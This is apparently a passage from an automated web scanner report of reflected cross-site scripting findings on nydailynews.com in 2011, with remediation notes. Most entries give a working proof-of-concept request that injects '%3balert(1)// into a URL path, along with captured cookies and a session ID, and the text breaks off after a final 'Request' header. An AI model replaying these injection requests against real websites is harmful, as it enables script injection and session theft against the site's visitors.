GET /news/national/2011/02/084e6aa'%3balert(1)//794c4c0d2b8/2011-02-08_matthew_hoffman_killer_who_hid_bodies_in_hollowedout_tree_details_crime_in_chill.html HTTP/1.1 Host: www.nydailynews.com Proxy-Connection: keep-alive Referer: http://www.nydailynews.com/index.html Accept: application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5 User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.13 (KHTML, like Gecko) Chrome/9.0.597.84 Safari/534.13 Accept-Encoding: gzip,deflate,sdch Accept-Language: en-US,en;q=0.8 Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3 Cookie: fpc1000563892833=bzFIWmAz|R9p7OeYKaa|fses1000563892833=|R9p7OeYKaa|bzFIWmAz|fvis1000563892833=ZT1odHRwJTNBJTJGJTJGYnVycCUyRnNob3clMkY0JmY9aHR0cCUzQSUyRiUyRnd3dy5ueWRhaWx5bmV3cy5jb20lMkZibG9nczcwZjc1JyUyNTNiYWxlcnQoZG9jdW1lbnQuY29va2llKSUyRiUyRjg0Zjc2NmI5YzE1JTJGamV0cyUyRjIwMTElMkYwMSUyRmxpdmUtY2hhdC1mcmlkYXktbm9vbi0xJmI9UGFnZSUyME5vdCUyMEZvdW5k|8s70ssTYHM|8s70ssTYHM|8s70ssTYHM|8|8s70ssTYHM|8s70ssTYHM; sto-id-sg-web-8080=CBACAKAK; Zvents=1djug47bp7; __vrf=3k7r5l65ggtu5gva; sto-id-sg-nydnapp-8080=CBADAKAK; WT_FPC=id=173.193.214.243-2605364368.30126492:lv=1297189499544:ss=1297189499544; zvents_tracker_sid=12971859055740.8106075366958976; __qca=P0-1704281983-1297185912293
Response
HTTP/1.1 404 Not Found Date: Tue, 08 Feb 2011 17:26:17 GMT Server: Apache Keep-Alive: timeout=3, max=992 Connection: Keep-Alive Content-Type: text/html Content-Language: en Vary: Accept-encoding Content-Length: 70312
The value of REST URL parameter 6 is copied into a JavaScript string which is encapsulated in single quotation marks. The payload 6d28f'%3balert(1)//8c2f8be01db was submitted in the REST URL parameter 6. This input was echoed as 6d28f';alert(1)//8c2f8be01db in the application's response.
This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.
Remediation detail
Echoing user-controllable data within a script context is inherently dangerous and can make XSS attacks difficult to prevent. If at all possible, the application should avoid echoing user data within this context.
Request
GET /news/national/2011/02/08/2011-02-08_matthew_hoffman_killer_who_hid_bodies_in_hollowedout_tree_details_crime_in_chill.html6d28f'%3balert(1)//8c2f8be01db HTTP/1.1 Host: www.nydailynews.com Proxy-Connection: keep-alive Referer: http://www.nydailynews.com/index.html Accept: application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5 User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.13 (KHTML, like Gecko) Chrome/9.0.597.84 Safari/534.13 Accept-Encoding: gzip,deflate,sdch Accept-Language: en-US,en;q=0.8 Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3 Cookie: fpc1000563892833=bzFIWmAz|R9p7OeYKaa|fses1000563892833=|R9p7OeYKaa|bzFIWmAz|fvis1000563892833=ZT1odHRwJTNBJTJGJTJGYnVycCUyRnNob3clMkY0JmY9aHR0cCUzQSUyRiUyRnd3dy5ueWRhaWx5bmV3cy5jb20lMkZibG9nczcwZjc1JyUyNTNiYWxlcnQoZG9jdW1lbnQuY29va2llKSUyRiUyRjg0Zjc2NmI5YzE1JTJGamV0cyUyRjIwMTElMkYwMSUyRmxpdmUtY2hhdC1mcmlkYXktbm9vbi0xJmI9UGFnZSUyME5vdCUyMEZvdW5k|8s70ssTYHM|8s70ssTYHM|8s70ssTYHM|8|8s70ssTYHM|8s70ssTYHM; sto-id-sg-web-8080=CBACAKAK; Zvents=1djug47bp7; __vrf=3k7r5l65ggtu5gva; sto-id-sg-nydnapp-8080=CBADAKAK; WT_FPC=id=173.193.214.243-2605364368.30126492:lv=1297189499544:ss=1297189499544; zvents_tracker_sid=12971859055740.8106075366958976; __qca=P0-1704281983-1297185912293
Response
HTTP/1.1 404 Not Found Date: Tue, 08 Feb 2011 17:26:18 GMT Server: Apache Keep-Alive: timeout=3, max=1000 Connection: Keep-Alive Content-Type: text/html Content-Language: en Vary: Accept-encoding Content-Length: 70312
The value of REST URL parameter 1 is copied into a JavaScript string which is encapsulated in single quotation marks. The payload ec2bb'%3b452488c4958 was submitted in the REST URL parameter 1. This input was echoed as ec2bb';452488c4958 in the application's response.
This behaviour demonstrates that it is possible to terminate the JavaScript string into which our data is being copied. An attempt was made to identify a full proof-of-concept attack for injecting arbitrary JavaScript but this was not successful. You should manually examine the application's behaviour and attempt to identify any unusual input validation or other obstacles that may be in place.
Note that a redirection occurred between the attack request and the response containing the echoed input. It is necessary to follow this redirection for the attack to succeed. When the attack is carried out via a browser, the redirection will be followed automatically.
Remediation detail
Echoing user-controllable data within a script context is inherently dangerous and can make XSS attacks difficult to prevent. If at all possible, the application should avoid echoing user data within this context.
Request
GET /ny_localec2bb'%3b452488c4958/bronx/ HTTP/1.1 Host: www.nydailynews.com Accept: */* Accept-Language: en User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0) Connection: close Cookie: ebNewBandWidth_.www.nydailynews.com=1856%3A1297185968724; sto-id-sg-forums-8081=CDADAKAK; JSESSIONID=D9616AEF4C50BF4404650F3882F4A245; fpc1000563892833=bzFIWmAz|R9p7OeYKaa|fses1000563892833=|R9p7OeYKaa|bzFIWmAz|fvis1000563892833=ZT1odHRwJTNBJTJGJTJGYnVycCUyRnNob3clMkY0JmY9aHR0cCUzQSUyRiUyRnd3dy5ueWRhaWx5bmV3cy5jb20lMkZibG9nczcwZjc1JyUyNTNiYWxlcnQoZG9jdW1lbnQuY29va2llKSUyRiUyRjg0Zjc2NmI5YzE1JTJGamV0cyUyRjIwMTElMkYwMSUyRmxpdmUtY2hhdC1mcmlkYXktbm9vbi0xJmI9UGFnZSUyME5vdCUyMEZvdW5k|8s70ssTYHM|8s70ssTYHM|8s70ssTYHM|8|8s70ssTYHM|8s70ssTYHM; WT_FPC=id=173.193.214.243-2605364368.30126492:lv=1297189628200:ss=1297189499544; sto-id-sg-web-8080=CBACAKAK; zvents_tracker_sid=12971859055740.8106075366958976; Zvents=1djug47bp7; sto-id-sg-nydnapp-8080=CBADAKAK; __qca=P0-1704281983-1297185912293; __vrf=3k7r5l65ggtu5gva;
Response (redirected)
HTTP/1.1 404 Not Found Date: Tue, 08 Feb 2011 18:36:44 GMT Server: Apache Connection: close Content-Type: text/html Content-Language: en Content-Length: 70077
The value of REST URL parameter 2 is copied into a JavaScript string which is encapsulated in single quotation marks. The payload 467c5'%3b925ee5a2258 was submitted in the REST URL parameter 2. This input was echoed as 467c5';925ee5a2258 in the application's response.
This behaviour demonstrates that it is possible to terminate the JavaScript string into which our data is being copied. An attempt was made to identify a full proof-of-concept attack for injecting arbitrary JavaScript but this was not successful. You should manually examine the application's behaviour and attempt to identify any unusual input validation or other obstacles that may be in place.
Note that a redirection occurred between the attack request and the response containing the echoed input. It is necessary to follow this redirection for the attack to succeed. When the attack is carried out via a browser, the redirection will be followed automatically.
Remediation detail
Echoing user-controllable data within a script context is inherently dangerous and can make XSS attacks difficult to prevent. If at all possible, the application should avoid echoing user data within this context.
Request
GET /ny_local/bronx467c5'%3b925ee5a2258/ HTTP/1.1 Host: www.nydailynews.com Accept: */* Accept-Language: en User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0) Connection: close Cookie: ebNewBandWidth_.www.nydailynews.com=1856%3A1297185968724; sto-id-sg-forums-8081=CDADAKAK; JSESSIONID=D9616AEF4C50BF4404650F3882F4A245; fpc1000563892833=bzFIWmAz|R9p7OeYKaa|fses1000563892833=|R9p7OeYKaa|bzFIWmAz|fvis1000563892833=ZT1odHRwJTNBJTJGJTJGYnVycCUyRnNob3clMkY0JmY9aHR0cCUzQSUyRiUyRnd3dy5ueWRhaWx5bmV3cy5jb20lMkZibG9nczcwZjc1JyUyNTNiYWxlcnQoZG9jdW1lbnQuY29va2llKSUyRiUyRjg0Zjc2NmI5YzE1JTJGamV0cyUyRjIwMTElMkYwMSUyRmxpdmUtY2hhdC1mcmlkYXktbm9vbi0xJmI9UGFnZSUyME5vdCUyMEZvdW5k|8s70ssTYHM|8s70ssTYHM|8s70ssTYHM|8|8s70ssTYHM|8s70ssTYHM; WT_FPC=id=173.193.214.243-2605364368.30126492:lv=1297189628200:ss=1297189499544; sto-id-sg-web-8080=CBACAKAK; zvents_tracker_sid=12971859055740.8106075366958976; Zvents=1djug47bp7; sto-id-sg-nydnapp-8080=CBADAKAK; __qca=P0-1704281983-1297185912293; __vrf=3k7r5l65ggtu5gva;
Response (redirected)
HTTP/1.1 404 Not Found Date: Tue, 08 Feb 2011 18:37:09 GMT Server: Apache Connection: close Content-Type: text/html Content-Language: en Content-Length: 70077
The value of REST URL parameter 1 is copied into a JavaScript string which is encapsulated in single quotation marks. The payload 6bafa'%3balert(1)//a64152033dd was submitted in the REST URL parameter 1. This input was echoed as 6bafa';alert(1)//a64152033dd in the application's response.
This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.
Remediation detail
Echoing user-controllable data within a script context is inherently dangerous and can make XSS attacks difficult to prevent. If at all possible, the application should avoid echoing user data within this context.
Request
GET /ny_local6bafa'%3balert(1)//a64152033dd/bronx/2011/02/06/2011-02-06_crushed_to_death_car_falls_on_him_in_bizarre_bx_accident.html HTTP/1.1 Host: www.nydailynews.com Accept: */* Accept-Language: en User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0) Connection: close Cookie: ebNewBandWidth_.www.nydailynews.com=1856%3A1297185968724; sto-id-sg-forums-8081=CDADAKAK; JSESSIONID=D9616AEF4C50BF4404650F3882F4A245; fpc1000563892833=bzFIWmAz|R9p7OeYKaa|fses1000563892833=|R9p7OeYKaa|bzFIWmAz|fvis1000563892833=ZT1odHRwJTNBJTJGJTJGYnVycCUyRnNob3clMkY0JmY9aHR0cCUzQSUyRiUyRnd3dy5ueWRhaWx5bmV3cy5jb20lMkZibG9nczcwZjc1JyUyNTNiYWxlcnQoZG9jdW1lbnQuY29va2llKSUyRiUyRjg0Zjc2NmI5YzE1JTJGamV0cyUyRjIwMTElMkYwMSUyRmxpdmUtY2hhdC1mcmlkYXktbm9vbi0xJmI9UGFnZSUyME5vdCUyMEZvdW5k|8s70ssTYHM|8s70ssTYHM|8s70ssTYHM|8|8s70ssTYHM|8s70ssTYHM; WT_FPC=id=173.193.214.243-2605364368.30126492:lv=1297189628200:ss=1297189499544; sto-id-sg-web-8080=CBACAKAK; zvents_tracker_sid=12971859055740.8106075366958976; Zvents=1djug47bp7; sto-id-sg-nydnapp-8080=CBADAKAK; __qca=P0-1704281983-1297185912293; __vrf=3k7r5l65ggtu5gva;
Response
HTTP/1.1 404 Not Found Date: Tue, 08 Feb 2011 18:36:56 GMT Server: Apache Connection: close Content-Type: text/html Content-Language: en Content-Length: 70160
The value of REST URL parameter 2 is copied into a JavaScript string which is encapsulated in single quotation marks. The payload e81be'%3balert(1)//d4dbb920a8d was submitted in the REST URL parameter 2. This input was echoed as e81be';alert(1)//d4dbb920a8d in the application's response.
This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.
Remediation detail
Echoing user-controllable data within a script context is inherently dangerous and can make XSS attacks difficult to prevent. If at all possible, the application should avoid echoing user data within this context.
Request
GET /ny_local/bronxe81be'%3balert(1)//d4dbb920a8d/2011/02/06/2011-02-06_crushed_to_death_car_falls_on_him_in_bizarre_bx_accident.html HTTP/1.1 Host: www.nydailynews.com Accept: */* Accept-Language: en User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0) Connection: close Cookie: ebNewBandWidth_.www.nydailynews.com=1856%3A1297185968724; sto-id-sg-forums-8081=CDADAKAK; JSESSIONID=D9616AEF4C50BF4404650F3882F4A245; fpc1000563892833=bzFIWmAz|R9p7OeYKaa|fses1000563892833=|R9p7OeYKaa|bzFIWmAz|fvis1000563892833=ZT1odHRwJTNBJTJGJTJGYnVycCUyRnNob3clMkY0JmY9aHR0cCUzQSUyRiUyRnd3dy5ueWRhaWx5bmV3cy5jb20lMkZibG9nczcwZjc1JyUyNTNiYWxlcnQoZG9jdW1lbnQuY29va2llKSUyRiUyRjg0Zjc2NmI5YzE1JTJGamV0cyUyRjIwMTElMkYwMSUyRmxpdmUtY2hhdC1mcmlkYXktbm9vbi0xJmI9UGFnZSUyME5vdCUyMEZvdW5k|8s70ssTYHM|8s70ssTYHM|8s70ssTYHM|8|8s70ssTYHM|8s70ssTYHM; WT_FPC=id=173.193.214.243-2605364368.30126492:lv=1297189628200:ss=1297189499544; sto-id-sg-web-8080=CBACAKAK; zvents_tracker_sid=12971859055740.8106075366958976; Zvents=1djug47bp7; sto-id-sg-nydnapp-8080=CBADAKAK; __qca=P0-1704281983-1297185912293; __vrf=3k7r5l65ggtu5gva;
Response
HTTP/1.1 404 Not Found Date: Tue, 08 Feb 2011 18:37:15 GMT Server: Apache Connection: close Content-Type: text/html Content-Language: en Content-Length: 70160
The value of REST URL parameter 3 is copied into a JavaScript string which is encapsulated in single quotation marks. The payload 298f5'%3balert(1)//89d2b5d0d9 was submitted in the REST URL parameter 3. This input was echoed as 298f5';alert(1)//89d2b5d0d9 in the application's response.
This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.
Remediation detail
Echoing user-controllable data within a script context is inherently dangerous and can make XSS attacks difficult to prevent. If at all possible, the application should avoid echoing user data within this context.
Request
GET /ny_local/bronx/2011298f5'%3balert(1)//89d2b5d0d9/02/06/2011-02-06_crushed_to_death_car_falls_on_him_in_bizarre_bx_accident.html HTTP/1.1 Host: www.nydailynews.com Accept: */* Accept-Language: en User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0) Connection: close Cookie: ebNewBandWidth_.www.nydailynews.com=1856%3A1297185968724; sto-id-sg-forums-8081=CDADAKAK; JSESSIONID=D9616AEF4C50BF4404650F3882F4A245; fpc1000563892833=bzFIWmAz|R9p7OeYKaa|fses1000563892833=|R9p7OeYKaa|bzFIWmAz|fvis1000563892833=ZT1odHRwJTNBJTJGJTJGYnVycCUyRnNob3clMkY0JmY9aHR0cCUzQSUyRiUyRnd3dy5ueWRhaWx5bmV3cy5jb20lMkZibG9nczcwZjc1JyUyNTNiYWxlcnQoZG9jdW1lbnQuY29va2llKSUyRiUyRjg0Zjc2NmI5YzE1JTJGamV0cyUyRjIwMTElMkYwMSUyRmxpdmUtY2hhdC1mcmlkYXktbm9vbi0xJmI9UGFnZSUyME5vdCUyMEZvdW5k|8s70ssTYHM|8s70ssTYHM|8s70ssTYHM|8|8s70ssTYHM|8s70ssTYHM; WT_FPC=id=173.193.214.243-2605364368.30126492:lv=1297189628200:ss=1297189499544; sto-id-sg-web-8080=CBACAKAK; zvents_tracker_sid=12971859055740.8106075366958976; Zvents=1djug47bp7; sto-id-sg-nydnapp-8080=CBADAKAK; __qca=P0-1704281983-1297185912293; __vrf=3k7r5l65ggtu5gva;
Response
HTTP/1.1 404 Not Found Date: Tue, 08 Feb 2011 18:37:50 GMT Server: Apache Connection: close Content-Type: text/html Content-Language: en Content-Length: 70159
The value of REST URL parameter 4 is copied into a JavaScript string which is encapsulated in single quotation marks. The payload c7319'%3balert(1)//86b12d25376 was submitted in the REST URL parameter 4. This input was echoed as c7319';alert(1)//86b12d25376 in the application's response.
This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.
Remediation detail
Echoing user-controllable data within a script context is inherently dangerous and can make XSS attacks difficult to prevent. If at all possible, the application should avoid echoing user data within this context.
Request
GET /ny_local/bronx/2011/02c7319'%3balert(1)//86b12d25376/06/2011-02-06_crushed_to_death_car_falls_on_him_in_bizarre_bx_accident.html HTTP/1.1 Host: www.nydailynews.com Accept: */* Accept-Language: en User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0) Connection: close Cookie: ebNewBandWidth_.www.nydailynews.com=1856%3A1297185968724; sto-id-sg-forums-8081=CDADAKAK; JSESSIONID=D9616AEF4C50BF4404650F3882F4A245; fpc1000563892833=bzFIWmAz|R9p7OeYKaa|fses1000563892833=|R9p7OeYKaa|bzFIWmAz|fvis1000563892833=ZT1odHRwJTNBJTJGJTJGYnVycCUyRnNob3clMkY0JmY9aHR0cCUzQSUyRiUyRnd3dy5ueWRhaWx5bmV3cy5jb20lMkZibG9nczcwZjc1JyUyNTNiYWxlcnQoZG9jdW1lbnQuY29va2llKSUyRiUyRjg0Zjc2NmI5YzE1JTJGamV0cyUyRjIwMTElMkYwMSUyRmxpdmUtY2hhdC1mcmlkYXktbm9vbi0xJmI9UGFnZSUyME5vdCUyMEZvdW5k|8s70ssTYHM|8s70ssTYHM|8s70ssTYHM|8|8s70ssTYHM|8s70ssTYHM; WT_FPC=id=173.193.214.243-2605364368.30126492:lv=1297189628200:ss=1297189499544; sto-id-sg-web-8080=CBACAKAK; zvents_tracker_sid=12971859055740.8106075366958976; Zvents=1djug47bp7; sto-id-sg-nydnapp-8080=CBADAKAK; __qca=P0-1704281983-1297185912293; __vrf=3k7r5l65ggtu5gva;
Response
HTTP/1.1 404 Not Found Date: Tue, 08 Feb 2011 18:39:10 GMT Server: Apache Connection: close Content-Type: text/html Content-Language: en Content-Length: 70160
The value of REST URL parameter 5 is copied into a JavaScript string which is encapsulated in single quotation marks. The payload c82a7'%3balert(1)//f6299d7f642 was submitted in the REST URL parameter 5. This input was echoed as c82a7';alert(1)//f6299d7f642 in the application's response.
This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.
Remediation detail
Echoing user-controllable data within a script context is inherently dangerous and can make XSS attacks difficult to prevent. If at all possible, the application should avoid echoing user data within this context.
Request
GET /ny_local/bronx/2011/02/06c82a7'%3balert(1)//f6299d7f642/2011-02-06_crushed_to_death_car_falls_on_him_in_bizarre_bx_accident.html HTTP/1.1 Host: www.nydailynews.com Accept: */* Accept-Language: en User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0) Connection: close Cookie: ebNewBandWidth_.www.nydailynews.com=1856%3A1297185968724; sto-id-sg-forums-8081=CDADAKAK; JSESSIONID=D9616AEF4C50BF4404650F3882F4A245; fpc1000563892833=bzFIWmAz|R9p7OeYKaa|fses1000563892833=|R9p7OeYKaa|bzFIWmAz|fvis1000563892833=ZT1odHRwJTNBJTJGJTJGYnVycCUyRnNob3clMkY0JmY9aHR0cCUzQSUyRiUyRnd3dy5ueWRhaWx5bmV3cy5jb20lMkZibG9nczcwZjc1JyUyNTNiYWxlcnQoZG9jdW1lbnQuY29va2llKSUyRiUyRjg0Zjc2NmI5YzE1JTJGamV0cyUyRjIwMTElMkYwMSUyRmxpdmUtY2hhdC1mcmlkYXktbm9vbi0xJmI9UGFnZSUyME5vdCUyMEZvdW5k|8s70ssTYHM|8s70ssTYHM|8s70ssTYHM|8|8s70ssTYHM|8s70ssTYHM; WT_FPC=id=173.193.214.243-2605364368.30126492:lv=1297189628200:ss=1297189499544; sto-id-sg-web-8080=CBACAKAK; zvents_tracker_sid=12971859055740.8106075366958976; Zvents=1djug47bp7; sto-id-sg-nydnapp-8080=CBADAKAK; __qca=P0-1704281983-1297185912293; __vrf=3k7r5l65ggtu5gva;
Response
HTTP/1.1 404 Not Found Date: Tue, 08 Feb 2011 18:40:07 GMT Server: Apache Connection: close Content-Type: text/html Content-Language: en Content-Length: 70160
The value of REST URL parameter 6 is copied into a JavaScript string which is encapsulated in single quotation marks. The payload 6c546'%3balert(1)//059a94aed66 was submitted in the REST URL parameter 6. This input was echoed as 6c546';alert(1)//059a94aed66 in the application's response.
This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.
Remediation detail
Echoing user-controllable data within a script context is inherently dangerous and can make XSS attacks difficult to prevent. If at all possible, the application should avoid echoing user data within this context.
Request
GET /ny_local/bronx/2011/02/06/2011-02-06_crushed_to_death_car_falls_on_him_in_bizarre_bx_accident.html6c546'%3balert(1)//059a94aed66 HTTP/1.1 Host: www.nydailynews.com Accept: */* Accept-Language: en User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0) Connection: close Cookie: ebNewBandWidth_.www.nydailynews.com=1856%3A1297185968724; sto-id-sg-forums-8081=CDADAKAK; JSESSIONID=D9616AEF4C50BF4404650F3882F4A245; fpc1000563892833=bzFIWmAz|R9p7OeYKaa|fses1000563892833=|R9p7OeYKaa|bzFIWmAz|fvis1000563892833=ZT1odHRwJTNBJTJGJTJGYnVycCUyRnNob3clMkY0JmY9aHR0cCUzQSUyRiUyRnd3dy5ueWRhaWx5bmV3cy5jb20lMkZibG9nczcwZjc1JyUyNTNiYWxlcnQoZG9jdW1lbnQuY29va2llKSUyRiUyRjg0Zjc2NmI5YzE1JTJGamV0cyUyRjIwMTElMkYwMSUyRmxpdmUtY2hhdC1mcmlkYXktbm9vbi0xJmI9UGFnZSUyME5vdCUyMEZvdW5k|8s70ssTYHM|8s70ssTYHM|8s70ssTYHM|8|8s70ssTYHM|8s70ssTYHM; WT_FPC=id=173.193.214.243-2605364368.30126492:lv=1297189628200:ss=1297189499544; sto-id-sg-web-8080=CBACAKAK; zvents_tracker_sid=12971859055740.8106075366958976; Zvents=1djug47bp7; sto-id-sg-nydnapp-8080=CBADAKAK; __qca=P0-1704281983-1297185912293; __vrf=3k7r5l65ggtu5gva;
Response
HTTP/1.1 404 Not Found Date: Tue, 08 Feb 2011 18:41:02 GMT Server: Apache Connection: close Content-Type: text/html Content-Language: en Content-Length: 70160
The value of REST URL parameter 1 is copied into a JavaScript string which is encapsulated in single quotation marks. The payload 73d92'%3balert(1)//64177312ae7 was submitted in the REST URL parameter 1. This input was echoed as 73d92';alert(1)//64177312ae7 in the application's response.
This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.
Remediation detail
Echoing user-controllable data within a script context is inherently dangerous and can make XSS attacks difficult to prevent. If at all possible, the application should avoid echoing user data within this context.
Request
GET /ny_local73d92'%3balert(1)//64177312ae7/bronx/2011/02/08/2011-02-08_budget_cuts_threaten_grandparent_family_apartments_sending_kids_back_to_life_on_.html HTTP/1.1 Host: www.nydailynews.com Accept: */* Accept-Language: en User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0) Connection: close Cookie: ebNewBandWidth_.www.nydailynews.com=1856%3A1297185968724; sto-id-sg-forums-8081=CDADAKAK; JSESSIONID=D9616AEF4C50BF4404650F3882F4A245; fpc1000563892833=bzFIWmAz|R9p7OeYKaa|fses1000563892833=|R9p7OeYKaa|bzFIWmAz|fvis1000563892833=ZT1odHRwJTNBJTJGJTJGYnVycCUyRnNob3clMkY0JmY9aHR0cCUzQSUyRiUyRnd3dy5ueWRhaWx5bmV3cy5jb20lMkZibG9nczcwZjc1JyUyNTNiYWxlcnQoZG9jdW1lbnQuY29va2llKSUyRiUyRjg0Zjc2NmI5YzE1JTJGamV0cyUyRjIwMTElMkYwMSUyRmxpdmUtY2hhdC1mcmlkYXktbm9vbi0xJmI9UGFnZSUyME5vdCUyMEZvdW5k|8s70ssTYHM|8s70ssTYHM|8s70ssTYHM|8|8s70ssTYHM|8s70ssTYHM; WT_FPC=id=173.193.214.243-2605364368.30126492:lv=1297189628200:ss=1297189499544; sto-id-sg-web-8080=CBACAKAK; zvents_tracker_sid=12971859055740.8106075366958976; Zvents=1djug47bp7; sto-id-sg-nydnapp-8080=CBADAKAK; __qca=P0-1704281983-1297185912293; __vrf=3k7r5l65ggtu5gva;
Response
HTTP/1.1 404 Not Found Date: Tue, 08 Feb 2011 18:36:58 GMT Server: Apache Connection: close Content-Type: text/html Content-Language: en Content-Length: 70184
The value of REST URL parameter 2 is copied into a JavaScript string which is encapsulated in single quotation marks. The payload eeb2a'%3balert(1)//6cde04187b4 was submitted in the REST URL parameter 2. This input was echoed as eeb2a';alert(1)//6cde04187b4 in the application's response.
This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.
Remediation detail
Echoing user-controllable data within a script context is inherently dangerous and can make XSS attacks difficult to prevent. If at all possible, the application should avoid echoing user data within this context.
Request
GET /ny_local/bronxeeb2a'%3balert(1)//6cde04187b4/2011/02/08/2011-02-08_budget_cuts_threaten_grandparent_family_apartments_sending_kids_back_to_life_on_.html HTTP/1.1 Host: www.nydailynews.com Accept: */* Accept-Language: en User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0) Connection: close Cookie: ebNewBandWidth_.www.nydailynews.com=1856%3A1297185968724; sto-id-sg-forums-8081=CDADAKAK; JSESSIONID=D9616AEF4C50BF4404650F3882F4A245; fpc1000563892833=bzFIWmAz|R9p7OeYKaa|fses1000563892833=|R9p7OeYKaa|bzFIWmAz|fvis1000563892833=ZT1odHRwJTNBJTJGJTJGYnVycCUyRnNob3clMkY0JmY9aHR0cCUzQSUyRiUyRnd3dy5ueWRhaWx5bmV3cy5jb20lMkZibG9nczcwZjc1JyUyNTNiYWxlcnQoZG9jdW1lbnQuY29va2llKSUyRiUyRjg0Zjc2NmI5YzE1JTJGamV0cyUyRjIwMTElMkYwMSUyRmxpdmUtY2hhdC1mcmlkYXktbm9vbi0xJmI9UGFnZSUyME5vdCUyMEZvdW5k|8s70ssTYHM|8s70ssTYHM|8s70ssTYHM|8|8s70ssTYHM|8s70ssTYHM; WT_FPC=id=173.193.214.243-2605364368.30126492:lv=1297189628200:ss=1297189499544; sto-id-sg-web-8080=CBACAKAK; zvents_tracker_sid=12971859055740.8106075366958976; Zvents=1djug47bp7; sto-id-sg-nydnapp-8080=CBADAKAK; __qca=P0-1704281983-1297185912293; __vrf=3k7r5l65ggtu5gva;
Response
HTTP/1.1 404 Not Found Date: Tue, 08 Feb 2011 18:37:20 GMT Server: Apache Connection: close Content-Type: text/html Content-Language: en Content-Length: 70184
The value of REST URL parameter 3 is copied into a JavaScript string which is encapsulated in single quotation marks. The payload 53d4e'%3balert(1)//7da93c3de9d was submitted in the REST URL parameter 3. This input was echoed as 53d4e';alert(1)//7da93c3de9d in the application's response.
This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.
Remediation detail
Echoing user-controllable data within a script context is inherently dangerous and can make XSS attacks difficult to prevent. If at all possible, the application should avoid echoing user data within this context.
Request
GET /ny_local/bronx/201153d4e'%3balert(1)//7da93c3de9d/02/08/2011-02-08_budget_cuts_threaten_grandparent_family_apartments_sending_kids_back_to_life_on_.html HTTP/1.1 Host: www.nydailynews.com Accept: */* Accept-Language: en User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0) Connection: close Cookie: ebNewBandWidth_.www.nydailynews.com=1856%3A1297185968724; sto-id-sg-forums-8081=CDADAKAK; JSESSIONID=D9616AEF4C50BF4404650F3882F4A245; fpc1000563892833=bzFIWmAz|R9p7OeYKaa|fses1000563892833=|R9p7OeYKaa|bzFIWmAz|fvis1000563892833=ZT1odHRwJTNBJTJGJTJGYnVycCUyRnNob3clMkY0JmY9aHR0cCUzQSUyRiUyRnd3dy5ueWRhaWx5bmV3cy5jb20lMkZibG9nczcwZjc1JyUyNTNiYWxlcnQoZG9jdW1lbnQuY29va2llKSUyRiUyRjg0Zjc2NmI5YzE1JTJGamV0cyUyRjIwMTElMkYwMSUyRmxpdmUtY2hhdC1mcmlkYXktbm9vbi0xJmI9UGFnZSUyME5vdCUyMEZvdW5k|8s70ssTYHM|8s70ssTYHM|8s70ssTYHM|8|8s70ssTYHM|8s70ssTYHM; WT_FPC=id=173.193.214.243-2605364368.30126492:lv=1297189628200:ss=1297189499544; sto-id-sg-web-8080=CBACAKAK; zvents_tracker_sid=12971859055740.8106075366958976; Zvents=1djug47bp7; sto-id-sg-nydnapp-8080=CBADAKAK; __qca=P0-1704281983-1297185912293; __vrf=3k7r5l65ggtu5gva;
Response
HTTP/1.1 404 Not Found Date: Tue, 08 Feb 2011 18:38:10 GMT Server: Apache Connection: close Content-Type: text/html Content-Language: en Content-Length: 70184
The value of REST URL parameter 4 is copied into a JavaScript string which is encapsulated in single quotation marks. The payload 1ce91'%3balert(1)//090f96c187c was submitted in the REST URL parameter 4. This input was echoed as 1ce91';alert(1)//090f96c187c in the application's response.
This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.
Remediation detail
Echoing user-controllable data within a script context is inherently dangerous and can make XSS attacks difficult to prevent. If at all possible, the application should avoid echoing user data within this context.
Request
